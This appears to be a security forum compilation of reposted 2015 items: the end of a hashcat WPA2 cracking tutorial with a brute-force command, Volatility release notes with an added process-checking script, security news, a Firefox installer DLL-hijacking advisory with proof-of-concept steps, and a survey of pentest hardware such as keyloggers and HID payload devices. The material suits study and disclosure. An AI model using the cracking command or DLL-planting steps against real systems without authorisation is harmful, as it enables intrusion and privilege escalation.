NOTE: Once execution is completed the session will be deleted.

How to restore? Above command + "--restore". Here it goes:

cudaHashcat64.exe -m 2500 rootsh3ll-01.hccap -a 3 Hello?d?l?d?u123?l?l?u --session=blabla --restore

Hashcat will now check in its working directory for any session previously created and simply resume the cracking process. Simple enough? Yes it is.

This is all for Hashcat. Hope you understand it well and performed it along. No need to be sad if you don't have enough money to purchase those expensive graphics cards for this purpose; you can still try cracking the passwords at high speeds using the cloud. You just have to pay accordingly.

Cloud for Cracking WPA/2-PSK

You can even leverage the cloud for the same purpose. You just have to pay for the service you use, as it requires a lot of money and electricity to keep the system up and running and keeping it fast at the same time.
A website that provides a similar service is http://cloudcracker.com/. They charge $17 for 300 million words in 20 minutes, which means 250,000 PMK/second. Sounds nice! Isn't it? Well, this is a service so they surely have their part of profit.

If you are at a shortage of money you can try an even cheaper service. Don't worry, this cheap one is actually better than the expensive one if you are able to do it accordingly. That is Amazon Elastic Compute Cloud (EC2) or AWS (Amazon Web Services). Here you need to do all the things manually after logging into the remote host that you have purchased. You have to install the tools and dependencies accordingly and give commands to the master server to perform the cracking. You can also create up to 1000 instances to distribute the load and increase the cracking speed. The price will change accordingly. But in short let me tell you, if you are willing to do this super interesting stuff, it will cost you a maximum of $1 an hour for even greater speeds than cloudcracker.

Here is a video to help you understand better the concept of load distribution and commanding the master server. Hope you are getting the concept. Here is one more for you to see the cracking process running on Amazon EC2. It's an old video but worth watching to understand the concept.

Forgot to tell you one good news. Amazon EC2 is FREE for the first month. It will just ask you for the credit/debit card info as validation proof. But don't worry, no extra penny will be deducted until you extend to a new plan. So I would encourage you to do some research on this specific topic after getting over Hashcat. It is the real fun, believe me! If you love all this crazy stuff you will love that too.

Hope this was helpful enough! Keep learning. See you in the next chapter with the Aircrack Boost Script!
Useful Links:
Router: TP-LINK TL-MR3420 300 Mbps Wireless Router, 2x 5dBi antennas
Network Adapters: Alfa AWUS036NH High Gain B/G/N USB / Alfa AWUS036NHA B/G/N USB
High Gain Antenna: Alfa 9dBi WiFi Omni-Directional High-Gain Antenna
USB Drive (32 GB): SanDisk Ultra Fit USB 3.0 32GB Pen Drive
Graphics Card
NVidia: GeForce GTX TITAN X 12GB (best single GPU for cracking)
AMD: Radeon HD 6990 830M 4 GB (3x HD 6990 equivalent to 1x Titan X) [cheap]

Sursa: http://www.rootsh3ll.com/2015/10/rwsps-wpa2-cracking-using-hashcat-cloud-ch5pt2/
-
Everyone should know what Volatility is.
-
This is the first release since the publication of The Art of Memory Forensics! It adds support for Windows 10 (initial), Linux kernels up to 4.2.3, and Mac OS X El Capitan. Additionally, the unified output rendering gives users the flexibility of asking for results in various formats (html, sqlite, json, xlsx, dot, text, etc.) while simplifying things for plugin developers. In short, less code leads to more functionality. This is especially useful for framework designers (GUIs, web interfaces, library APIs), because you can interface with a plugin directly and ask for json, which you then store, process, or modify however you want. This release also coincides with the Community repo, a collection of Volatility plugins written and maintained by authors in the forensics community. Many of these are the result of the last 3 years of Volatility plugin contests, but some were just written for fun. Either way, it's an entire arsenal of plugins that you can easily extend into your existing Volatility installation.
Released: October 2015

Downloads:
• Volatility 2.5 Windows Standalone Executable
• Volatility 2.5 Mac OS X Standalone Executables
• Volatility 2.5 Linux Standalone Executables
• Volatility 2.5 Source Code (.zip)
• Integrity Hashes
• View the README
• View the CREDITS

Release Highlights

Windows
• Added profiles for Windows 8.1 Update 1
• Added basic support for Windows 10
• New plugin to print AmCache information from the registry (amcache)
• New plugin to dump registry files to disk (dumpregistry)
• New plugin to detect hidden/unlinked service record structures (servicediff)
• New plugin to print the shutdown time from the registry (shutdowntime)
• New plugin to print editbox controls from the GUI subsystem (editbox)
• Malfind plugin detects injected code with erased PE headers
• Imagecopy and raw2dmp can display the number of bytes copied or converted
• Fixed an issue with the memmap and memdump offsets being inconsistent
• Fixed an issue with vadtree's graphviz fill colors not being rendered by some viewers
• Updated the well-known SIDs reported by the getsids plugin
• Added an optional --max-size parameter to yarascan, dump_maps, etc.
• Fixed an issue translating strings in PAE and x64 images
• Added options to yarascan for case-insensitive search
• Added options to yarascan to scan process and kernel memory at once

Mac OS X
• Added profiles and support for Mac 10.10 Yosemite and 10.11 El Capitan
• New plugin to print and extract compressed swap data (mac_compressed_swap)
• New plugin to automatically detect Mac OS X profiles (mac_get_profile)
• New plugins to report Kauth scopes and listeners (mac_list_kauth_scopes, mac_list_kauth_listeners)
• New plugin to identify applications with promiscuous sockets (mac_list_raw)
• New plugin to find hidden threads (mac_orphan_threads)
• New plugin to print process environment variables (mac_psenv)
• New plugin to print basic and complex thread data (mac_threads, mac_threads_simple)

Linux/Android
• Added support for Linux kernels up to 4.2.3
• New plugin to print Linux dynamic environment variables (linux_dynamic_env)
• New plugin to print the current working directory of processes (linux_getcwd)
• New plugin to carve for network connection structures (linux_netscan)
• Speed improvements to various plugins
• Improved handling of mprotect() Linux memory regions

Operating System Support
• 64-bit Windows Server 2012 and 2012 R2
• 32- and 64-bit Windows 10 (initial/basic support)
• 32- and 64-bit Windows 8, 8.1, and 8.1 Update 1
• 32- and 64-bit Windows 7 (all service packs)
• 32- and 64-bit Windows Server 2008 (all service packs)
• 64-bit Windows Server 2008 R2 (all service packs)
• 32- and 64-bit Windows Vista (all service packs)
• 32- and 64-bit Windows Server 2003 (all service packs)
• 32- and 64-bit Windows XP (SP2 and SP3)
• 32- and 64-bit Linux kernels from 2.6.11 to 4.2.3
• 32-bit 10.5.x Leopard (the only 64-bit 10.5 is Server, which isn't supported)
• 32- and 64-bit 10.6.x Snow Leopard
• 32- and 64-bit 10.7.x Lion
• 64-bit 10.8.x Mountain Lion (there is no 32-bit version)
• 64-bit 10.9.x Mavericks (there is no 32-bit version)
• 64-bit 10.10.x Yosemite (there is no 32-bit version)
• 64-bit 10.11.x El Capitan (there is no 32-bit version)

Memory Format Support
• Raw/Padded Physical Memory
• Firewire (IEEE 1394)
• Expert Witness (EWF)
• 32- and 64-bit Windows Crash Dump
• 32- and 64-bit Windows Hibernation
• 32- and 64-bit MachO files
• VirtualBox Core Dumps
• VMware Saved State (.vmss) and Snapshot (.vmsn)
• HPAK Format (FastDump)
• QEMU memory dumps

Sursa: http://www.volatilityfoundation.org/#!25/c1f29
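The unified output mentioned in the release notes is what lets a plugin's json rendering be post-processed without touching Volatility internals. As an added example (not part of Volatility or of the release notes), the Python below consumes pslist-style output assumed to have the 2.5 json renderer's shape, a dict with a "columns" list and a "rows" list of equal-length lists, builds the parent/child relationships and flags processes whose parent is absent from the listing or whose parent name does not match a small expectation table for core Windows 7 processes. The SAMPLE data is constructed for the example, as are the expectation table and the function names.

```python
"""Consume Volatility 2.5-style JSON plugin output (added example).

Not part of Volatility. It assumes the shape the 2.5 JSON renderer emits,
a dict with a "columns" list and a "rows" list, and applies two classic
pslist sanity checks: orphaned processes and wrong parent names.
"""
import json

# Constructed pslist output in the assumed columns/rows shape; not a real dump.
SAMPLE = json.dumps({
    "columns": ["Offset(V)", "Name", "PID", "PPID", "Thds", "Hnds", "Sess", "Wow64", "Start", "Exit"],
    "rows": [
        [0xfffffa8000c8e040, "System",        4,    0, 98, 512, -1, 0, "2015-10-29 10:00:00", ""],
        [0xfffffa8001a2b060, "smss.exe",    264,    4,  2,  29, -1, 0, "2015-10-29 10:00:01", ""],
        [0xfffffa8001c10b30, "csrss.exe",   352,  344,  9, 390,  0, 0, "2015-10-29 10:00:02", ""],
        [0xfffffa8001c6e2c0, "wininit.exe", 400,  344,  3,  76,  0, 0, "2015-10-29 10:00:02", ""],
        [0xfffffa8001d91b30, "services.exe",488,  400,  7, 219,  0, 0, "2015-10-29 10:00:03", ""],
        [0xfffffa8001da5b30, "lsass.exe",   496,  400,  6, 585,  0, 0, "2015-10-29 10:00:03", ""],
        [0xfffffa8002b13b30, "svchost.exe", 612,  488, 10, 352,  0, 0, "2015-10-29 10:00:04", ""],
        [0xfffffa8002f50060, "lsass.exe",  2540, 1720,  4,  61,  1, 0, "2015-10-29 11:12:40", ""],  # planted
        [0xfffffa8002f80b30, "explorer.exe",1720, 1688, 30, 900,  1, 0, "2015-10-29 10:01:00", ""],
    ],
})

# Expected parent for a few core Windows 7 processes (assumption, kept small).
EXPECTED_PARENT = {
    "smss.exe": "System",
    "services.exe": "wininit.exe",
    "lsass.exe": "wininit.exe",
    "svchost.exe": "services.exe",
}


def load_treegrid(text):
    """Turn the renderer's columns/rows into a list of per-row dicts."""
    data = json.loads(text)
    cols = data["columns"]
    return [dict(zip(cols, row)) for row in data["rows"]]


def find_orphans(rows):
    """PIDs whose PPID is not present in the listing (PPID 0 is the root).

    csrss.exe and wininit.exe are normally orphans because the smss.exe
    instance that spawned them has already exited; explorer.exe is too,
    since userinit.exe exits after launching it. Anything else is worth a look.
    """
    pids = {r["PID"] for r in rows}
    return sorted(r["PID"] for r in rows if r["PPID"] not in pids and r["PPID"] != 0)


def find_wrong_parents(rows):
    """(PID, name, actual parent name) for rows that violate EXPECTED_PARENT."""
    by_pid = {r["PID"]: r for r in rows}
    hits = []
    for r in rows:
        want = EXPECTED_PARENT.get(r["Name"])
        if want is None:
            continue
        parent = by_pid.get(r["PPID"])
        actual = parent["Name"] if parent else None
        if actual != want:
            hits.append((r["PID"], r["Name"], actual))
    return hits


if __name__ == "__main__":
    rows = load_treegrid(SAMPLE)
    print("orphans:", find_orphans(rows))
    print("wrong parents:", find_wrong_parents(rows))
```

On the constructed sample the second lsass.exe is caught because its parent is explorer.exe instead of wininit.exe, while the three legitimate orphans are listed for the analyst to dismiss; the same two functions work unchanged on real `--output=json` pslist output as long as the column names match.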
-
Linux (x86) Exploit Development Series
Nytro replied to neox's topic in Reverse engineering & exploit development
Good job! -
Researchers use Wi-Fi to see gestures, identify individuals through walls by Lisa Vaas on October 30, 2015 MIT has created a device that can discern where you are, who you are, and which hand you're moving, from the opposite side of a building, through a wall, even though you're invisible to the naked eye. Researchers at MIT's Computer Science and Artificial Intelligence Lab (CSAIL) have long thought it could be possible to use wireless signals like Wi-Fi to see through walls and identify people. The team is now working on a system called RF-Capture that picks up wireless reflections from the human body to see the silhouette of a human standing behind a wall. It's the first system capable of capturing the human figure when the person is fully occluded, MIT said in an announcement on Wednesday. CSAIL researchers have been working to track human movement since 2013. They have already unveiled wireless technologies that can detect gestures and body movements "as subtle as the rise and fall of a person’s chest from the other side of a house," which, MIT says, could enable a mother to monitor a baby’s breathing or a firefighter to determine if there are survivors inside a burning building. RF-Capture's motion-capturing technology can also enable it to call emergency services if it detects that a family member has fallen, according to Dina Katabi, an MIT professor, paper co-author and director of the Wireless@MIT center: We’re working to turn this technology into an in-home device that can call 911 if it detects that a family member has fallen unconscious. The RF-Capture device works by transmitting wireless signals and then reconstructing a human figure by analyzing the signals' reflections. Unlike the emergency-alert wristbands and pendants often worn by the elderly - including the meme-generating "I've fallen and I can't get up" LifeCall devices - people don't need to wear a sensor to be picked up by RF-Capture. 
The device's transmitting power is 10,000 times lower than that of a standard mobile phone. In a paper accepted to the SIGGRAPH Asia conference taking place next month, the team reports that by tracking a human silhouette, RF-Capture can trace a person’s hand as he writes in the air, determine how a person behind a wall is moving, and even distinguish between 15 different people through a wall, with nearly 90% accuracy. That's just one of many possible uses in a networked, "smart" home, Katabi said: You could also imagine it being used to operate your lights and TVs, or to adjust your heating by monitoring where you are in the house. Beyond tracking the elderly or saving people from burning buildings, MIT also has its eye on Hollywood. PhD student Fadel Adib, lead author on the team's paper, suggested that RF-Capture could be a less clunky way to capture motion than what's now being used: Today actors have to wear markers on their bodies and move in a specific room full of cameras. RF-Capture would enable motion capture without body sensors and could track actors’ movements even if they are behind furniture or walls. RF-Capture analyzes the human form in two stages: First, it scans a given space in three dimensions to capture wireless reflections off objects in the environment, including furniture or humans. Given the curvature of human bodies, some of the signals get bounced back, while some get bounced away from the device. RF-Capture then monitors how these reflections vary as someone moves in the environment, stitching the person’s reflections across time to reconstruct one, single image of a silhouette. To differentiate individuals, the team then repeatedly tested and trained the device on different subjects, incorporating metrics such as height and body shape to create "silhouette fingerprints" for each person. MIT says the key challenge is that the same signal is reflected from different individuals as well as from different body parts. 
How do you tell the difference between various limbs, never mind entire humans? Katabi says it boils down to number crunching: The data you get back from these reflections are very minimal. However, we can extract meaningful signals through a series of algorithms we developed that minimize the random noise produced by the reflections. Sursa: https://nakedsecurity.sophos.com/2015/10/30/researchers-use-wi-fi-to-see-gestures-identify-individuals-through-walls/
-
CoinVault and Bitcryptor ransomware victims don't need to pay the ransom
Posted on 30.10.2015

Kaspersky Lab has added an additional 14,031 decryption keys to their free repository, enabling all those who have fallen victim to CoinVault and Bitcryptor ransomware to retrieve their encrypted data without having to pay a ransom to cybercriminals.

The cybercriminals behind CoinVault tried to infect tens of thousands of computers worldwide, with the majority of victims in the Netherlands, Germany, the USA, France and the UK. Consumers from a total of 108 countries were affected. The criminals succeeded in locking at least 1,500 Windows-based machines, demanding bitcoins from users to decrypt their files.

Kaspersky Lab discovered the first version of CoinVault in May 2014, and later completed a thorough analysis of all the associated malware samples for the investigation run by the National High Tech Crime Unit (NHTCU) of the Netherlands' police and the Netherlands' National Prosecutors Office. During the joint investigation, the NHTCU and the Netherlands' National Prosecutors Office obtained databases from CoinVault command & control servers. These servers contained Initialization Vectors (IVs), keys and private bitcoin wallets, which helped Kaspersky Lab and the NHTCU to create a special repository of decryption keys: noransom.kaspersky.com.

Since April 2015, a total of 14,755 keys have been made available to victims so that they can release their files using the decryption application developed by Kaspersky Lab's security experts. In September, the Dutch police arrested two men in the Netherlands on suspicion of involvement in the ransomware attacks. With these arrests, and the fact that the last portion of keys has now been obtained from the server, the case on the CoinVault attacks is now closed.
“The CoinVault story is ending: the remaining victims can retrieve their files and the cybercriminals have been caught, thanks to collaboration between the Dutch police, Kaspersky Lab and Panda Security. The CoinVault investigation has been unique in that we have been able to retrieve all the keys. Through sheer hard work we were able to disrupt the entire business model of the cybercriminal group,” said Jornt van der Wiel, Security Researcher at Global Research and Analysis Team, Kaspersky Lab. Sursa: http://www.net-security.org/malware_news.php?id=3137
-
Critical vulnerability allowed some guests to access underlying operating system.
by Dan Goodin - Oct 29, 2015 7:34pm EET

For seven years, Xen virtualization software used by Amazon Web Services and other cloud computing providers has contained a vulnerability that allowed attackers to break out of their confined accounts and access extremely sensitive parts of the underlying operating system. The bug, which some researchers say is probably the worst ever to hit the open source project, was finally made public Thursday along with a patch.

As a result of the bug, "malicious PV guest administrators can escalate privilege so as to control the whole system," Xen Project managers wrote in an advisory. The managers were referring to an approach known as paravirtualization, which allows multiple lower-privileged users to run highly isolated computing instances on the same piece of hardware. By allowing guests to break out of those confines, CVE-2015-7835, as the vulnerability is indexed, compromised a core tenet of virtualization. It comes five months after a similarly critical bug was disclosed in the Xen, KVM, and native QEMU virtual machine platforms.

"The above is a political way of stating the bug is a very critical one," researchers with Qubes OS, a desktop operating system that uses Xen to secure sensitive resources, wrote in an analysis published Thursday. "Probably the worst we have seen affecting the Xen hypervisor, ever. Sadly."

Thursday's disclosure comes a few weeks after Xen Project managers privately warned a select group of predisclosure members of the vulnerability. That means Amazon and many other cloud services have already patched the vulnerability. It would also explain why some services have recently required customers to restart their guest operating systems. Members of Linode, for instance, received e-mails two weeks ago notifying them of Xen security advisories that would require a reboot no later than October 29, when the updates would go live. An Amazon advisory, meanwhile, said the update required no reboot.

"Really shocking"

The Qubes OS analysis criticized the development process that allowed a bug of such high severity to persist for such a long time. It also questioned whether it was time for Xen developers to redesign the hypervisor to do away with paravirtualized virtual machines. Qubes researchers wrote:

Admittedly this is a subtle bug, because there is no buggy code that could be spotted immediately. The bug emerges only if one looks at a bigger picture of logic flows (compare also QSB #09 for a somehow similar situation). On the other hand, it is really shocking that such a bug has been lurking in the core of the hypervisor for so many years. In our opinion the Xen project should rethink their coding guidelines and try to come up with practices and perhaps additional mechanisms that would not let similar flaws plague the hypervisor ever again (assert-like mechanisms perhaps?). Otherwise the whole project makes no sense, at least to those who would like to use Xen for security-sensitive work.

The vulnerability affects Xen version 3.4 and later, but only on x86 systems. ARM systems are not susceptible. Only paravirtualization guests can exploit the bug, and it doesn't matter if the guests are running 32-bit or 64-bit instances. Now that the vulnerability has gone public, it's a fair bet that unpatched systems will be exploited. Anyone relying on Xen who has not yet updated should install the patch as soon as possible.

Sursa: http://arstechnica.com/security/2015/10/xen-patches-7-year-old-bug-that-shattered-hypervisor-security/
-
Arbitrary code execution resp. escalation of privilege with Mozilla's SETUP.EXE
From: "Stefan Kanthak" <stefan.kanthak () nexgo de>
Date: Wed, 28 Oct 2015 20:04:23 +0100

Hi @ll,

Mozilla's (executable) full setup packages for Windows allow arbitrary code execution resp. escalation of privilege: their SETUP.EXE loads SHFOLDER.DLL ['] from a temporary (sub)directory "%TEMP%\7zS<hex>.tmp\" created during self-extraction of the full setup packages.

This vulnerability is well-known; every developer past absolute beginner should know about it: <https://capec.mitre.org/data/definitions/471.html>

See <https://bugzilla.mozilla.org/show_bug.cgi?id=792106> for all the trouble Mozilla's developers went through to fix this vulnerability in the 7zip self-extractor.
See <https://bugzilla.mozilla.org/show_bug.cgi?id=961676> for this vulnerability in their maintenance_installer.exe.

Proof of concept:
~~~~~~~~~~~~~~~~~
1. Fetch any Mozilla full setup package (these are self-extracting archives built with 7zip), for example "Firefox Setup 38.3.0esr.exe" from <https://www.mozilla.org/en-US/firefox/organizations/all/>

2. Extract this full setup package into an arbitrary directory, for example "%TEMP%\7zSxyz.tmp", using (again for example)

   7za.exe x -o"%TEMP%\7zSxyz.tmp" "Firefox Setup 38.3.0esr.exe"

3. Fetch <http://home.arcor.de/skanthak/download/SENTINEL.DLL> (see <http://home.arcor.de/skanthak/sentinel.html>) and save it as "%TEMP%\7zSxyz.tmp\shfolder.dll"

4. Start "%TEMP%\7zSxyz.tmp\setup.exe" per double-click: the installer detection of Windows User Account Control (see <https://technet.microsoft.com/en-us/library/dd835540.aspx#BKMK_InstDet>) will chime in and prompt for consent resp. for an administrator password, then "%TEMP%\7zSxyz.tmp\setup.exe" loads "%TEMP%\7zSxyz.tmp\shfolder.dll", which displays a message box.

Mitigation(s):
~~~~~~~~~~~~~~
0. DON'T USE EXECUTABLE INSTALLERS [²]!
   If your favourite applications are not distributed in the native installer package format of the resp. target OS: ask^WURGE their vendors/developers to provide native installation packages. If they don't: dump these applications, stay away from such software!

1. Turn off privilege elevation for standard users and installer detection for all users:

   [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
   "ConsentPromptBehaviorUser"=dword:00000000 ; Automatically deny elevation requests
   "EnableInstallerDetection"=dword:00000000

   See <https://technet.microsoft.com/en-us/library/dd835564.aspx>

2. Deny execution in all "%TEMP%" directories and their subdirectories:
   * add the NTFS ACE "(D;OIIO;WP;;;WD)" meaning "deny execution of files in this directory for everyone, inheritable to all files in all subdirectories" (use CACLS.EXE /SDDL for example);
   * use "software restriction policies" resp. AppLocker.

stay tuned
Stefan Kanthak

PS: Mozilla has been sitting on this unfixed vulnerability for about 30 months: see <https://bugzilla.mozilla.org/show_bug.cgi?id=861012>

['] SHFOLDER.DLL is cruft from the last millennium; it was used on Windows 9x without Internet Explorer 4; see <https://support.microsoft.com/en-us/kb/241733>
    DON'T USE the code shown in this MSKB article! See <https://msdn.microsoft.com/en-us/library/ff919712.aspx>, <https://msdn.microsoft.com/en-us/library/ms682586.aspx> and <https://technet.microsoft.com/en-us/library/2269637.aspx>

[²] Self-extracting archives and executable installers are flawed^W insanely stupid in concept and dangerous in practice. DON'T USE SUCH CRUFT! ALWAYS use the resp. platform's native package and archive format. For Windows these are .INF (plus .CAB) and .MSI (plus .CAB), introduced 20 years ago (with Windows 95 and Windows NT4) resp. 16 years ago (with Office 2000).
    Both .INF and .MSI are "opened" by programs residing in %SystemRoot%\System32\ which are therefore immune to this kind of "DLL (and EXE) Search Order Hijacking" attack. Since both .INF and .MSI can access the contents of .CAB directly they eliminate the attack vector "unsafe temporary directory" too.

    See <http://home.arcor.de/skanthak/temp/FIREFOX.INF> and <http://home.arcor.de/skanthak/temp/FIREFOX.DDF> as an example of a native installer package for "Firefox 38.3.0 ESR (x86 de)":

    1.a. Create FIREFOX.CAB from the unpacked full setup package (see above; I used the German language version): run the command line
         MAKECAB.EXE /D SourceDir="%TEMP%\7zS<hex>.tmp\core" /F FIREFOX.DDF

    1.b. Create FIREFOX.CAB from the copy installed on your system: run the command line
         MAKECAB.EXE /D SourceDir="%ProgramFiles%\Mozilla Firefox" /F FIREFOX.DDF

    2. Install Firefox from FIREFOX.CAB: right-click FIREFOX.INF and then click "Install", or run the command line
         InfDefaultInstall.Exe "<path>\FIREFOX.INF"
       resp.
         RunDll32.Exe SetupAPI.Dll,InstallHinfSection DefaultInstall 132 <path>\FIREFOX.INF

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Sursa: http://seclists.org/fulldisclosure/2015/Oct/109
-
Evaluating, Testing and Breaking Security Software Breaking security software!!! Slides here: https://www.dropbox.com/sh/h2o7y5s5ijl2awx/AAAdeR4DTiCU_izt_1RJhXVAa?dl=0
-
Tor Messenger Beta: Chat over Tor, Easily
Posted October 29th, 2015 by sukhbir

Today we are releasing a new, beta version of Tor Messenger, based on Instantbird, an instant messaging client developed in the Mozilla community.

What is it?

Tor Messenger is a cross-platform chat program that aims to be secure by default and sends all of its traffic over Tor. It supports a wide variety of transport networks, including Jabber (XMPP), IRC, Google Talk, Facebook Chat, Twitter, Yahoo, and others; enables Off-the-Record (OTR) Messaging automatically; and has an easy-to-use graphical user interface localized into multiple languages.

What it isn't...

Tor Messenger builds on the networks you are familiar with, so that you can continue communicating in a way your contacts are willing and able to do. This has traditionally been in a client-server model, meaning that your metadata (specifically the relationships between contacts) can be logged by the server. However, your route to the server will be hidden because you are communicating over Tor. We are also excited about systems like Pond and Ricochet, which try to solve this problem, and would encourage you to look at their designs and use them too.

Why Instantbird?

We considered a number of messaging clients: Pidgin, Adam Langley's xmpp-client, and Instantbird. Instantbird was the pragmatic choice: its transport protocols are written in a memory-safe language (JavaScript); it has a graphical user interface and already supports many natural languages; and it's a XUL application, which means we can leverage both the code (Tor Launcher) and in-house expertise that the Tor Project has developed working on Tor Browser with Firefox. It also has an active and vibrant software developer community that has been very responsive and understanding of our needs. The main feature it lacked was OTR support, which we have implemented and hope to upstream to the main Instantbird repository for the benefit of all Instantbird (and Thunderbird) users.

Current Status

Today we are releasing a beta version with which we hope to gain both usability and security related feedback. There have been three previous alpha releases to the mailing lists that have already helped smooth out some of the rougher edges.

Downloads
• Linux (32-bit)
• Linux (64-bit)
• Windows
• OS X
• sha256sums.txt
• sha256sums.txt.asc

The sha256sums.txt file containing hashes of the bundles is signed with the key 0x6887935AB297B391 (fingerprint: 3A0B 3D84 3708 9613 6B84 5E82 6887 935A B297 B391).

Instructions

On Linux, extract the bundle(s) and then run: ./start-tor-messenger.desktop
On OS X, copy the Tor Messenger application from the disk image to your local disk before running it.
On all platforms, Tor Messenger sets the profile folder for Firefox/Instantbird to the installation directory.

Note that as a policy, unencrypted one-to-one conversations are not allowed and your messages will not be transmitted if the person you are talking with does not have an OTR-enabled client. You can disable this option in the preferences to allow unencrypted communication but doing so is not recommended.

Source Code

We are doing automated builds of Tor Messenger for all platforms. The Linux builds are reproducible: anyone who builds Tor Messenger for Linux should have byte-for-byte identical binaries compared with other builds from a given source. You can build it yourself and let us know if you encounter any problems or cannot match our build. The Windows and OS X builds are not completely reproducible yet but we are working on it.

What's to Come

Our current focus is security, robustness and user experience. We will be fixing bugs and releasing updates as appropriate, and in the future, we plan on pairing releases with Mozilla's Extended Support Release (ESR) cycle. We have some ideas on where to take Tor Messenger but we would like to hear what you have to say. Some possibilities include:
• Reproducible builds for Windows and OS X
• Sandboxing
• Automatic updates
• Improved Tor support
• OTR over Twitter DMs
• Produce (and distribute) internationalized builds
• Secure multi-party communication (np1sec)
• Encrypted file-transfers
• Usability study

How To Help

Give it a try and provide feedback, requests, and file bugs (choose the "Tor Messenger" component). If you are a developer, help us close all our tickets or help us review our design doc. As always, we are idling on IRC in #tor-dev (OFTC) (nicks: arlolra; boklm; sukhe) and subscribed to the tor-talk/dev mailing lists.

Please note that this release is for users who would like to help us with testing the product but at the same time who also understand the risks involved in using beta software. Thanks and we hope you enjoy Tor Messenger!

Sursa: https://blog.torproject.org/blog/tor-messenger-beta-chat-over-tor-easily
-
Hardware assisted penetration testing

Penetration testing or pentesting is the practice of attacking your own or your clients' IT systems in the same way a hacker would, to identify security holes. Before starting a penetration test you normally need to clearly define the scope and get written consent from the client; in other words, you need a pre-engagement contract signed by your client. Depending on the information in your possession it could be a white-box or a black-box pentest. You'll also need to follow a standard methodology while conducting the test in order to ensure quality, reproducibility and comparability of your pentest. I'm not going to talk about this now, but I plan to write a series of articles on this matter in the future.

Every ethical hacker or penetration tester uses a variety of software to accomplish various tasks: some are well-known frameworks for vulnerability assessment like Nexpose, Nessus and OpenVAS (just to name a few) or exploitation frameworks like Metasploit, Core Impact Pro and Immunity Canvas, together with in-house tools. Obviously any software needs a personal computer, a server or a cloud instance to run. Apart from this, there is a variety of other small devices and appliances that can assist a penetration tester during his job, and today I'm going to talk about exactly that.

HARDWARE KEYLOGGERS

Hardware keyloggers are used for keystroke logging, a method of capturing and recording computer users' keystrokes, including sensitive information like passwords and credit card numbers. They can be implemented via BIOS-level firmware, or alternatively via a device plugged inline between a computer keyboard and a computer. They usually consist of a microcontroller, a flash memory and a USB or PS/2 connector.

[Images: USB keylogger; PS/2 keylogger; KeySweeper wireless keyboard sniffer; covert keylogger keyboard; hardware video logger (frame grabber)]

SIGINT AND TEMPEST SYSTEMS

SIGINT (SIGnals INTelligence) is intelligence derived from electronic signals and systems used by foreign targets, such as communications systems, radars, and weapons systems. SIGINT provides a vital window for our nation into foreign adversaries' capabilities, actions, and intentions.

TEMPEST is a National Security Agency specification and NATO certification referring to spying on information systems through leaking emanations, including unintentional radio or electrical signals, sounds, and vibrations. TEMPEST covers both methods to spy upon others and also how to shield equipment against such spying. The protection efforts are also known as emission security (EMSEC), which is a subset of communications security (COMSEC). For more information about TEMPEST see: The Complete, Unofficial TEMPEST Information Page.

[Images: TEMPEST attack; Van Eck phreaking demonstration]

Another interesting demonstration was given in a 2009 Black Hat talk entitled "Sniffing Keystrokes With Lasers/Voltmeters – Side Channel Attacks Using Optical Sampling Of Mechanical Energy And Power Line Leakage" by Andrea Barisani and Daniele Bianco of Inverse Path Ltd.: https://www.blackhat.com/presentations/bh-usa-09/BARISANI/BHUSA09-Barisani-Keystrokes-SLIDES.pdf

WiFi HACKING DEVICES

Devices usually made of a router with an antenna capable of packet injection and a custom firmware, usually based on a Linux distro with hacking tools installed (aircrack-ng and others). An example of such a device is the WiFi Pineapple:

WIFI PINEAPPLE
The WiFi Pineapple Mark V is the latest generation wireless network auditing tool from Hak5. With its custom, purpose-built hardware and software, the WiFi Pineapple enables users to quickly and easily deploy advanced attacks using an intuitive web interface. From a man-in-the-middle hot-spot honeypot to an out-of-band pentest pivot box, the WiFi Pineapple is unmatched in performance, value and versatility.

Another example of a WiFi cracking device is Reaver Pro:

REAVER PRO II
Reaver Pro is able to crack a WEP password in only a few minutes; WPA cracking is also fast in case WPS is enabled.

PENTEST BOXES

MiniPwner: made up of a portable TP-Link MR3040 running OpenWrt
MINI PWNER

Pwnie Express solutions:
PWN PLUG R3
PWN PRO
PWN PHONE
PWN PAD

#r00tabaga is thinner than the MiniPwner, smaller and lighter than the WiFi Pineapple, and has a built-in 2000mAh Li-ion battery
#R00TABAGA

TrustedSec Attack Platform (TAP): TAP ensures that the system is always up to date with your latest patches and uses the PenTesters Framework (https://github.com/trustedsec/ptf) to automatically install all of your tools and keep them up to date. For hardware, it uses the Intel NUC series with a solid-state drive, 16 GB of RAM, an Alfa wireless adapter attached for wireless assessments and a Verizon LTE card so you don't have to worry about egress filtering if it isn't available. TAP is used internally by TrustedSec and isn't available for sale, but the software is open source and can be found here: https://github.com/trustedsec/tap
TAP

HID ATTACKS

A Human Interface Device is a device that can be plugged into the USB port of a computer and is recognized as a keyboard, so it is automatically trusted and its input is executed by the computer (unlike CDs/DVDs and normal USB drives that rely on Autorun). It can be programmed to deliver a payload (as keystrokes) that can do many things, even spawning a shell, dumping passwords and escalating privileges.

Teensy: a complete USB-based microcontroller development system, in a very small footprint, capable of implementing many types of projects. All programming is done via the USB port. No special programmer is needed, only a standard "Mini-B" USB cable and a PC or Macintosh with a USB port.
TEENSY

There are some libraries available for Teensy, like PHUKD by IronGeek, SET, Kautilya and Peensy.

BadUSB: a concept of HID attack vector presented at Black Hat 2014 by Karsten Nohl.

USB RUBBER DUCKY: a HID attack tool by Hak5
RUBBER DUCKY

MAKE YOUR OWN HACKER GADGET

All of us have heard about or used hacker gadgets like the WiFi Pineapple, MiniPwner, Pwn Plug, R00tabaga etc. They are fantastic to use for demos, in social engineering tasks, for explaining security implications in a fun way to non-security professionals, and in actual pentest task automation! But what does it take to build one? In this course, we will teach you how to build a Hacker Gadget (or Pentest Gadget if you prefer) for less than $50 from scratch. How much technical expertise do you need to follow this course? If you've installed Linux and ever configured an Access Point, you will feel right at home! See the course on PentesterAcademy, a SecurityTube.net initiative.

BOOKS

Some useful books for creating your own hacker gadget:
[Images: book covers]

Happy hacking!

Author: Fabio Baroni
Date: 2015-10-29 22:46:19
Sursa: http://www.pentest.guru/index.php/2015/10/29/hardware-assisted-penetration-testing/
-
What exactly do you want to modify in the program? How complex is it?
-
nullcon Goa 2015: Cold Boot Attack on DDR2 and DDR3 RAM by Marko Schuba

Published on 17 Jun 2015

